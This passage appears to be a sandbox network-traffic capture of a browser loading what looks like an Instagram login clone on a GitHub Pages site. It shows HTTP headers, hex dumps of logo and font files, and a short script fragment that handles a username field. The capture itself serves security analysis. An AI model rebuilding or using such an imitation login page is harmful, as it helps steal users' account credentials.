                                                                                                                                                                                                                                Data Ascii: setInterval(() => { loading.style.display = 'flex'; }, 500); const encodedUsername = encodeURIComponent(username.value);
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC456INData Raw: 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 61 74 63 68 28 28 65 72 72 6f 72 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 65 72 74 28 22 45 72 72 6f 72 21 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 3a 20 22 20 2b 20 65 72 72 6f 72 2e 6d 65 73 73 61 67 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 72 72 6f 72 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 6e 6f 6e 65 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 72
                                                                                                                                                                                                                                Data Ascii: }) .catch((error) => { alert("Error! Please try again: " + error.message); console.log(error); loading.style.display = 'none'; user


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                9192.168.2.449747185.199.109.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC380OUTGET /instagram.com/img//instagram-logo.png HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC739INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 3841
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                x-origin-cache: HIT
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-f01"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: AD25:1EEB85:2E07C1E:334C753:66F8DD2E
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:03 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                Age: 61
                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740030-EWR
                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                                                                                                X-Timer: S1727585644.779045,VS0,VE1
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: bffdee681c7de70ad95dbd6b7e6d45ce521e8f74
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ce 00 00 00 3a 08 03 00 00 00 cf c2 96 f9 00 00 02 fd 50 4c 54 45 00 00 00 23 1f 20 23 1f 20 ff ff ff 23 20 20 24 1f 24 23 1f 20 27 21 21 40 20 40 23 20 20 24 24 24 24 20 21 23 1f 20 28 22 22 23 1f 20 2b 2b 2b 24 24 24 25 21 21 55 55 55 23 20 21 80 80 80 27 21 21 24 1f 21 24 20 21 25 1f 25 24 1f 20 2e 2e 2e 23 20 23 23 20 21 2e 23 23 23 20 21 29 23 23 40 40 40 28 22 22 23 20 22 25 20 25 26 21 21 24 20 21 23 20 23 24 21 21 29 29 29 24 20 20 23 20 21 25 1f 21 33 33 33 25 22 22 24 20 24 23 20 21 24 1f 21 24 20 21 24 20 21 24 20 20 26 22 22 39 39 39 26 26 26 25 20 22 23 1f 20 27 27 27 26 21 21 28 28 28 23 1f 21 24 20 21 24 24 24 25 1f 22 23 20 22 24 20 20 24 1f 21 23 23 23 23 20 21 24 20 20 24 1f 21 25
                                                                                                                                                                                                                                Data Ascii: PNGIHDR:PLTE# # # $$# '!!@ @# $$$$ !# (""# +++$$$%!!UUU# !'!!$!$ !%%$ ...# ## !.### !)##@@@(""# "% %&!!$ !# #$!!)))$ # !%!333%""$ $# !$!$ !$ !$ &""999&&&% "# '''&!!(((#!$ !$$$%"# "$ $!#### !$ $!%
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: dd 3b 7d dd fa 36 d3 06 53 bc b3 72 c4 8d 1d 7b e6 27 c3 12 0a e0 82 02 2d a1 8c 8e dd c6 7c 83 0b c9 3e 82 f2 bb 85 24 75 4a 8f 9a 74 1a f6 ba 2e 0d b6 c2 cd b5 9f 2d 80 47 74 ed 18 16 5f 02 d7 76 8a 95 30 fe 54 7f 80 2f d8 f8 64 36 92 d2 26 c2 23 30 e2 8b 18 8e db 9f 0c 1c 8b 0e 78 a7 b3 15 fe 57 ec e6 f7 23 fd 03 ba 65 01 eb a6 27 c0 f6 e9 e3 ad 92 21 56 75 7a f2 23 58 5e be ed d9 34 18 6b 49 06 21 ae 36 e9 7c 4b f2 86 0c 88 c3 11 24 83 cd b3 e1 58 14 43 92 e1 c7 e0 78 9b 22 13 ae 5d c3 a9 2e 0b bd 48 f6 bf cb 5d 8f 8c cb a8 82 2d 76 f9 19 f1 e3 2a 00 98 75 e1 96 62 7a 3d aa ae c9 cf 93 51 8b 5b 43 f5 26 d9 2e 09 a8 96 22 7f fb 68 00 48 8b 24 b9 e6 35 38 64 70 45 10 cd 4d 65 1b ec 96 ec b1 7e aa 5f 9c 41 75 88 a2 32 cd d0 17 14 3b e0 88 8f a2 ed 89 66
                                                                                                                                                                                                                                Data Ascii: ;}6Sr{'-|>$uJt.-Gt_v0T/d6&#0xW#e'!Vuz#X^4kI!6|K$XCx"].H]-v*ubz=Q[C&."hH$58dpEMe~_Au2;f
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1085INData Raw: 21 f7 51 3d 67 cf d9 67 10 13 d7 c3 a8 41 a1 c3 ed 4f b3 22 18 4b 31 0d c0 87 e4 9b f0 d6 da 3c 64 b2 49 6d 8a a1 9e 29 d9 e8 6d 78 b8 cf bc 6b 46 c1 33 ae ba 81 03 7a af 79 ce ce 7c 09 3b 9a 71 00 87 28 ea 9b cf ad f6 7a 3e 4d 95 05 24 9b d3 ba 66 67 99 74 b2 dc 02 cb 26 50 23 28 5a 00 ad 63 b8 a7 01 6c 8d b4 13 f9 24 82 3d 7a 98 d4 0b a2 28 22 63 01 33 85 9f 9a 7d 7f 9d f7 cb 5c dd 1e 9e 2f db 13 cc d6 18 4f b1 0b aa be a7 c9 39 e5 d9 33 9f 51 24 02 c8 90 e0 9c de bf be 62 18 2f 50 fc ec 5e e1 3c 05 73 4a f9 0c 12 6e 71 a6 d7 ed 13 13 fb 73 6d 28 97 e2 0d ab 9a 2c a7 78 19 62 96 bb bf 81 7c 8a 07 bd 4f 8a 2b a3 b8 ad 00 b6 a4 08 b7 bd ab 45 f7 46 c5 91 66 e6 a5 96 11 41 d3 2f fc 40 d1 ce b9 24 7b 27 e9 21 df 03 63 8c 16 97 24 b3 3a 03 a1 be a4 78 37 f6
                                                                                                                                                                                                                                Data Ascii: !Q=ggAO"K1<dIm)mxkF3zy|;q(z>M$fgt&P#(Zcl$=z("c3}\/O93Q$b/P^<sJnqsm(,xb|O+EFfA/@${'!c$:x7


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                10192.168.2.449746185.199.109.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC377OUTGET /instagram.com/img/apple-button.png HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC719INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 3754
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-eaa"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:04:03 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: 37DF:277281:27AD1B6:2C28ACE:66F8DD6A
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:03 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                X-Served-By: cache-nyc-kteb1890068-NYC
                                                                                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                X-Timer: S1727585644.780115,VS0,VE16
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: 17f85d140104c9047d9ae1ce8a6942be1f7b0ef2
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 32 00 00 00 5a 08 03 00 00 00 0c c8 2a 74 00 00 01 8c 50 4c 54 45 00 00 00 a6 a6 a6 a6 a6 a6 a5 a5 a5 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a5 a5 a5 a4 a4 a4 a4 a4 a4 a4 a4 a4 a6 a6 a6 a5 a5 a5 a6 a6 a6 a7 a7 a7 a7 a7 a7 a6 a6 a6 a0 a0 a0 63 63 63 2e 2e 2e 0f 0f 0f 00 00 00 02 02 02 12 12 12 37 37 37 6d 6d 6d a6 a6 a6 a5 a5 a5 a5 a5 a5 72 72 72 1d 1d 1d 83 83 83 5c 5c 5c 05 05 05 89 89 89 a6 a6 a6 29 29 29 80 80 80 4b 4b 4b 1f 1f 1f 32 32 32 90 90 90 d6 d6 d6 fb fb fb 40 40 40 0c 0c 0c 17 17 17 24 24 24 c0 c0 c0 ff ff ff 62 62 62 9e 9e 9e 9c 9c 9c 8c 8c 8c 6b 6b 6b 30 30 30 60 60 60 df df df 86 86 86 fd fd fd 46 46 46 b3 b3 b3 d3 d3 d3 a3 a3 a3 5b 5b 5b 50 50 50 68 68 68 f7 f7 f7 bf bf bf ad ad ad 93
                                                                                                                                                                                                                                Data Ascii: PNGIHDR2Z*tPLTEccc...777mmmrrr\\\)))KKK222@@@$$$bbbkkk000```FFF[[[PPPhhh
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 9b 67 12 aa 4b 26 c7 79 0b 48 64 87 fe 96 da 01 74 b0 e1 81 b3 18 a7 32 c0 a3 ca c9 1e f4 b5 30 05 cc 32 7d 99 92 df d2 a1 65 ef 84 f0 a6 38 d9 07 08 fd e4 8c b5 64 8d 5a b2 6b ae 38 34 e1 9f 91 ac 91 dc ea 4a 01 55 26 73 90 4d 00 ce 73 4d 9c e4 2a 80 56 de b5 b1 13 3e 3a 7a 39 57 21 d9 37 7d 63 9a 64 42 42 8c 7c 03 e0 20 9b 4c de 64 0f 84 0e 53 32 31 d2 00 21 49 2a d5 24 9b e4 a7 9f 78 5c b6 f8 7d 49 af d1 7c e3 b1 9a cc 36 94 5b 89 d1 45 f7 03 20 dd 32 ad 02 90 4e 79 ed b6 c1 ce 8f a3 13 a8 90 4c 7a cb 5d 19 b8 09 70 10 78 20 d7 81 6e 66 93 e1 90 1b 37 40 2c 6e 4e 16 64 68 11 90 3f 32 2e 57 48 f6 89 d7 e5 c9 d6 c9 d5 97 4c 66 fb dc 70 1e e0 c6 ca d0 7b 18 d4 e4 e4 01 85 d0 ee d0 c2 73 c9 6e 7b a2 c7 9b a4 d7 06 21 76 c0 d3 48 f8 07 d9 69 6c b2 c7 5a 22
                                                                                                                                                                                                                                Data Ascii: gK&yHdt202}e8dZk84JU&sMsM*V>:z9W!7}cdBB| LdS21!I*$x\}I|6[E 2NyLz]px nf7@,nNdh?2.WHLfp{sn{!vHilZ"
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC998INData Raw: 61 97 e4 44 4d c9 3c 21 5a d6 fa d4 69 b7 74 63 8e 97 42 d4 9c ec 10 79 cb 14 3a 8c 77 35 5e f2 3f 37 82 32 2d 8e 00 b3 d6 cc c9 cc 99 c3 25 5f 19 96 8d 8d fe e4 89 93 f5 07 35 25 c3 00 ad ba b5 be 20 a6 a5 c7 93 f9 28 04 8d 64 a6 81 cf 46 e8 32 37 bd 14 42 9e f2 64 5e f3 0b a1 c3 98 5c a1 30 09 dd 0c cb c4 6b 4b d6 ef a6 45 ab 55 ec 76 ef 9f 48 d6 53 55 32 d8 33 14 3a cb 93 bd 2b 49 e6 30 26 57 28 34 3e 71 05 c5 de df 74 19 cb 75 35 bb 90 60 79 32 d3 e7 af 3c d9 19 85 ae 27 4e d0 76 94 27 9b a5 30 5d f2 c5 b4 a3 2c 59 1b 85 33 c5 6c b8 c6 64 9e 0c ad d8 5f 40 05 2e 0a b7 4b 86 30 85 b8 54 48 76 82 bc 2f 45 2b f4 31 f2 7e a3 30 83 47 85 29 f4 94 27 d3 12 6d 23 ef 96 82 bf 2c 59 d2 ea 49 52 eb c9 30 43 2b 7a 9e 3e b9 15 81 41 ce 50 f8 5a 48 76 57 18 4a 53
                                                                                                                                                                                                                                Data Ascii: aDM<!ZitcBy:w5^?72-%_5% (dF27Bd^\0kKEUvHSU23:+I0&W(4>qtu5`y2<'Nv'0],Y3ld_@.K0THv/E+1~0G)'m#,YIR0C+z>APZHvWJS


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                11192.168.2.449748104.17.25.144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC657OUTGET /ajax/libs/font-awesome/6.5.2/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                                                                                                                                                                                Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://sayidanur.github.io
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: font
                                                                                                                                                                                                                                Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:04 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 117852
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                ETag: "660cc074-1cc5c"
                                                                                                                                                                                                                                Last-Modified: Wed, 03 Apr 2024 02:35:32 GMT
                                                                                                                                                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                Age: 748781
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 04:54:04 GMT
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F0GoaEK0ogXqGqQaL4ZrbMW11rZfh8tFlBBokIH5%2FO0MOwUSgwMYgBZt9oKOXct1eCvl4tnJXnCutJRYtPByQWc3n5UE8V6PUUdBsLl9aRfoFrFN%2FqWtVsXCXZN0IiCPvnXyS3u5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ca95f84beed43ee-EWR
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC424INData Raw: 77 4f 46 32 00 01 00 00 00 01 cc 5c 00 0a 00 00 00 03 18 65 00 01 cc 0f 03 05 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 90 6c 00 a6 3a ca 8b de 38 cb 90 70 05 88 1d 07 20 25 32 8c 71 ec 80 d4 e0 3c 00 00 d4 d6 9f 07 65 44 4f 5a 2d 1e 00 55 55 55 8f 09 c1 dd ab f6 03 10 7e fa e5 37 bf fb c3 9f fe f2 b7 7f fc eb 3f ff fb cb c0 d8 1d 10 cb 76 5c cf 37 fc ff 37 96 de f7 b3 1b 22 b4 85 29 b3 ac 23 10 72 8a 7a 85 8c 90 05 92 53 82 e3 2b 01 5d c2 2d ff 25 dc 32 0f 2f da 7b b1 15 26 a2 ce 44 cc 8b 7c 27 46 92 2b 65 0a 0f 20 9d 5f 2f eb 22 b3 20 4f 92 bb 1f 73 50 93 9e 00 ff d4 3b 7d cf 55 fa ac 91 27 56 48 b1 0a 1c 50 81 36 60 15 90 ec 22 fe 31 a8 80 f8 f7 a0 88 b0 2b af 4b ce 4f ef cc af af 53 a0 12 54 c9 96 a5
                                                                                                                                                                                                                                Data Ascii: wOF2\e6$ `l:8p %2q<eDOZ-UUU~7?v\77")#rzS+]-%2/{&D|'F+e _/" OsP;}U'VHP6`"1+KOST
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1369INData Raw: d2 a4 4d 93 dd 94 60 f7 b2 4d 7b 5d a0 2c 63 2f 47 c4 fd bf 47 d0 43 a2 f4 fe f9 55 ea 77 55 dd 5b 75 e9 01 37 cf 4c f7 4c f7 e0 6e bf c6 25 ad c0 72 d6 96 49 32 c4 c2 58 01 29 c0 b2 13 76 a2 10 b1 73 08 37 c9 ff 0e 31 8f fe 42 55 fb 7d bb 8b 5d 00 0b 60 51 3a 41 82 20 45 42 8d 12 21 56 d9 96 2d 39 d5 8e e4 96 fa a5 5c 5c 52 9a 7d b5 ea 9a 2f d7 7a d7 9f 4b ee fb b7 de 24 9e e7 81 fd 5a f7 61 15 67 65 22 fa 4f 35 36 56 63 cf b4 81 2b 67 9d 0c 74 c2 2e 8c c6 c6 46 0f 6b 27 56 ff f5 fc dd 35 30 12 04 90 b3 d2 1c f1 24 26 89 13 44 c0 f3 df dc e7 9d 64 b7 00 f8 4a 34 f9 c0 6e f1 f8 b2 0d 4c e0 43 26 27 33 cb ca d7 b8 0a 5d a3 6b 34 f9 df 97 a5 f5 ed 09 90 5f 28 89 ff 47 e4 08 b9 6e d6 68 b9 55 ab d1 eb 3e e7 3e 5f dc f7 3c cc e6 79 44 2e 3c 22 73 e1 91 89 85
                                                                                                                                                                                                                                Data Ascii: M`M{],c/GGCUwU[u7LLn%rI2X)vs71BU}]`Q:A EB!V-9\\R}/zK$Zage"O56Vc+gt.Fk'V50$&DdJ4nLC&'3]k4_(GnhU>>_<yD.<"s
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1369INData Raw: 07 08 7a 1b 04 10 06 6f 21 33 64 87 bc 50 1a da 40 67 e8 02 5d a1 1b 74 87 1e d0 13 7a 41 6f e8 03 7d a1 1f f4 87 01 30 10 06 c1 60 18 02 43 61 18 0c 87 11 30 12 46 c1 68 18 93 b3 70 ce a6 39 9b e5 6c 9e b3 65 ce 65 5a 98 96 a0 a9 5a 06 ad b6 d6 44 6b a9 4d d5 66 3a ff bb 1e ba 2b b9 3b b9 5f 79 84 a7 8c a7 8e 67 95 67 8d 67 63 5a e1 b4 41 69 fb d3 6e e8 d1 ba 4d cf ab 17 d4 cb eb 95 f5 76 7a 57 7d b0 3e 4e 9f ea ed e9 ed ed 9d ec 9d eb 5d ec 5d e3 7d e6 75 62 02 e6 c2 3c 58 02 cb 61 73 6c 83 3d b0 37 f6 c1 01 38 18 87 e0 30 9c 80 93 70 2a ce c3 a5 b8 12 d7 e0 7a dc 8d 27 f0 3c de c5 17 f8 19 7f a0 81 bf c9 4a 11 a4 50 32 15 a2 22 54 92 2a 50 3d ea 40 9d a9 2f 0d a0 41 34 81 26 d3 6c 5a 4c 4b 69 19 ad a2 35 b4 9d f6 d0 5e da 4f 47 e9 24 5d a7 d7 f4 9e 34
                                                                                                                                                                                                                                Data Ascii: zo!3dP@g]tzAo}0`Ca0Fhp9leeZZDkMf:+;_ygggcZAinMvzW}>N]]}ub<Xasl=780p*z'<JP2"T*P=@/A4&lZLKi5^OG$]4
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1369INData Raw: c6 b0 39 e6 a5 31 6a 8e f9 68 ac 32 c7 fc 34 d6 9d d0 02 34 36 a0 b1 11 16 a4 71 10 8d e3 6d be 43 e3 24 1a 27 63 25 e6 fe c7 73 ac 42 db db 73 ac 4a fb d2 73 ac 46 fb d6 73 ac 4e fb 27 73 ac 41 47 ef 39 d6 a4 63 d1 39 d6 a2 63 d5 39 d6 a6 e3 92 39 d6 a1 e3 b2 39 d6 a5 e3 ea 09 ac 47 e7 1c 3a e7 c1 fa 74 ee 4d 13 da 90 ce db e9 bc 13 1b d1 f9 22 9d 2f e1 74 17 65 8d b2 8e cd 29 87 50 0e c7 96 94 d3 79 84 6d 29 67 52 ce c6 6d 5f b9 18 e5 12 d8 ec 2b 97 a6 5c 06 87 51 b9 f9 65 8e dd 28 b7 9b 63 77 ca 7d 46 d8 83 f2 30 ca c3 71 d7 57 1e 4b 79 3c d6 a2 e6 4e db 1c 3d 68 ee 32 42 77 9a c7 d0 3c 16 6f 51 f3 74 9e e3 00 9a e7 8e 70 20 cd 4b 68 5e 86 af be e6 bb 34 3f c0 51 d4 9c bb cd 71 24 a9 ff 1c 47 91 a6 cc 31 80 34 ed ab bf 7a 1a a5 05 79 02 47 93 16 23 2d
                                                                                                                                                                                                                                Data Ascii: 91jh2446qmC$'c%sBsJsFsN'sAG9c9c999G:tM"/te)Pym)gRm_+\Qe(cw}F0qWKy<N=h2Bw<oQtp Kh^4?Qq$G14zyG#-
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1369INData Raw: 9e d0 cd 1c cc 61 30 54 4f 8d a9 87 a1 99 34 b9 69 e4 8d b4 9e 1e 79 19 27 d2 fa 70 12 56 46 46 0c bd 8c 95 b0 92 8d 67 e3 f6 70 55 65 e8 65 4c f2 6c 3a a9 ca a2 30 94 2b ab 52 6b 5e f1 d2 09 7e d1 e7 1c dc 87 1e 71 3d e9 73 8e 9d 13 91 5b b7 d5 4e a1 f8 8d ab 59 c5 52 4a 3d 54 0f 61 41 5c 4f 5e be ed 73 0e 7b 54 91 9d bf 15 8a be 31 b7 7d 6e e3 4a bd c5 7c 3e 9f 7f 46 57 9f bb 5e c2 04 96 e8 6d 08 85 63 6d 4c ac 94 19 17 23 13 1b 6d 62 1d 73 8b 5b 79 6e 32 6e 59 25 8d b5 36 63 dc 48 79 75 6e 71 65 22 6e a5 49 9e 4d a7 66 94 8e 4c 6a 8c c9 f2 8f ae d2 75 a2 e3 aa b4 ed 23 65 79 6e 8c 19 d5 b9 21 55 59 4d cd a4 2a 8b 85 ef 38 98 c0 48 72 1b 13 cf f5 8f 46 5b 1b 40 28 f6 9a 86 40 ac 9b 51 ec 0b cb 0a 1a ad a8 39 9d ff 4d 10 20 6c b5 95 60 94 59 c2 93 81 52
                                                                                                                                                                                                                                Data Ascii: a0TO4iy'pVFFgpUeeLl:0+Rk^~q=s[NYRJ=TaA\O^s{T1}nJ|>FW^mcmL#mbs[yn2nY%6cHyunqe"nIMfLju#eyn!UYM*8HrF[@(@Q9M l`YR
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1369INData Raw: 8a 14 6c 68 86 7b ad 66 46 3f fc dc 8d bd 5d 6c 7c 04 c9 e0 eb 1c 21 3d 17 c0 9e 01 32 f8 91 05 3b d8 bf 89 8b 31 94 56 bb 3f e1 02 38 8e 90 de cb b1 f0 1b 57 f0 0e 78 87 87 18 95 8b cc b0 33 2e 1d 8a a7 c3 f5 d9 c3 b9 ff ee fd 27 c1 12 94 32 2e 84 58 2d 03 80 00 66 42 08 0e af 17 42 f0 77 be 93 0b 21 04 a5 6c e1 86 a1 bb 60 94 0a 9d 94 d5 d1 0c 7e 06 66 48 a1 bd a8 ed cc 99 48 a3 1f 59 ee bd af 78 58 63 47 b1 c2 01 40 9c 73 b5 28 db 0c f4 7c d3 f2 0f f1 a4 bd 82 f9 35 fa d0 6a 89 45 66 18 4e e9 10 15 74 c8 2b 4f 26 8c 52 01 7c f5 89 4b fc 99 30 fb 8b b2 5a 3e 31 46 f5 f5 05 8c 60 81 ae a0 bb 78 cc e8 1f 29 d3 a4 03 b1 94 38 15 95 53 44 66 af 30 ba 63 7b 58 be 0c dd 77 cd ee c6 5e 0e 97 75 d4 db dd a8 d5 7d 9d 97 ba f9 be 24 09 9c b9 9f 26 e1 46 7b 04 16
                                                                                                                                                                                                                                Data Ascii: lh{fF?]l|!=2;1V?8Wx3.'2.X-fBBw!l`~fHHYxXcG@s(|5jEfNt+O&R|K0Z>1F`x)8SDf0c{Xw^u}$&F{
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1369INData Raw: 9a 9e fe e3 f2 02 9e 8e b6 f7 87 cb b0 79 e9 e8 19 4f 4a c7 06 f0 9e de ad 40 ef ec df 4c f6 e4 51 ba cf 5c 3d 76 37 6f ba 97 70 97 7d f8 c1 ed a1 cb 68 33 d0 67 03 93 ae cb 5c 8a d8 e3 1f 7e 51 07 2e 27 d8 7e 6a bb d5 04 bc bd 73 f5 a5 c9 9a 44 c7 00 b1 4e c0 28 5c 06 d6 f0 eb 3b f2 24 6f 0c 06 e9 e1 d5 9d 6d 7c b1 80 58 27 89 8e 21 ef 91 fd 5b 38 85 1f 41 5f 8c 87 50 03 3d 3d 32 71 61 50 aa 9f 21 93 3d 76 29 53 21 13 1e cc 22 fb 91 d9 02 82 6d 41 9b 3c 9f 5f 44 b0 da b2 bc 32 dc 64 fc f3 b6 28 61 54 6e 5e c2 d0 ea b4 75 d3 97 96 7f 52 dd 0e 9b ad 88 51 0c 32 39 f2 01 f1 24 77 00 a2 30 92 c7 bd 7d 3e 7b ee f5 fc 93 ea b6 a7 62 21 b9 45 a8 e7 49 37 8a 5c c6 8e 7b f0 ac ec 44 8e eb 34 7c e0 8e 5b ab 6f 6e 0d 66 cd 58 10 9b 73 0c c0 84 27 a5 c5 28 26 60 71
